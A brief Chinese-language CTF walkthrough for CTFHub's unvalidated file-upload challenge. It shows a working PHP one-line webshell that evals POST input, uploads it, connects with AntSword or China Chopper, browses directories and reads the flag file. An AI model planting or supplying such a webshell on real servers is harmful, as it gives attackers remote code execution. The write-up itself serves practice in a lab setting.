ctfhub技能树—文件上传—无验证

打开靶机

查看页面信息

编写一句话木马

<?php 
echo "123";
@eval(@$_POST['a']);
?>

上传木马

上传成功，并拿到相对路径地址

查看页面信息

使用蚁剑或菜刀连接

查看目录信息

查看flag_368114112.php文件信息

成功拿到flag